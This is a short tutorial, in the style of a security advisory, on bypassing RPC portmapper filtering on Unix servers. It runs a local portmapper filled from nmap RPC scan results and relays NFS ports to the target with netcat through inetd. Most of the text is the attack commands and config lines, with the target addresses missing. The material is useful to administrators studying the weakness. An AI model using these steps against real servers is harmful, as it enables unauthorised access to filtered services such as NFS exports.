Bypass RPC Portmapper Filtering

Portmapper is a registry of Remote Procedure Call services including RPC Services number, version number, TCP/UDP port and protocol. It generally runs on port 111 TCP/UDP.

When a client wishes to connect to a service they first connect to the Portmapper, an administrator may filter this port beliving that it will prevent an attacker connecting to services offered, however this is not the case as an attacker may replicate the portmapper locally and proxy requests to the target machine.

Impact: Attacker may be able to connect to vulnerable services offered by filtered Portmapper.

Affected: Unix Servers


First of all determine the offered RPC Services using Nmap, by:

nmap -sR -p 111-5000 20000-50000
nmap -sUR -p 111-5000 20000-50000

Create a portmapper file containing the information discovered by nmap, as:

10000 2 tcp 111 portmapper
10000 2 udp 111 portmapper
10003 2 tcp 2049 nfs
10003 3 tcp 2049 nfs
10003 4 tcp 2049 nfs
10003 2 udp 2049 nfs
10003 3 udp 2049 nfs
10003 4 udp 2049 nfs

Create a local portmapper and supply the port map file to the mapper, like:

# portmap
# pmap_set < rpc_file_data

test the setup by running rpcinfo against YOUR machine

# rpcinfo -p

Now it is time to setup the attacking machine to redirect to the target

store the mappings in a tab separated inetd file, inetd.conf, as:

2049 stream tcp nowait root /usr/sbin/tcpd /bin/nc 2049
2049 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 2049
# killall inetd
# inetd ./inetd.conf

now services requested on the local machine will use the local portmapper but be proxy-redirected to the target server! So you can use client software such as in the following example:

 # showmount -e

example output:

Export list for
 / (everyone)

This output is not for but the target server!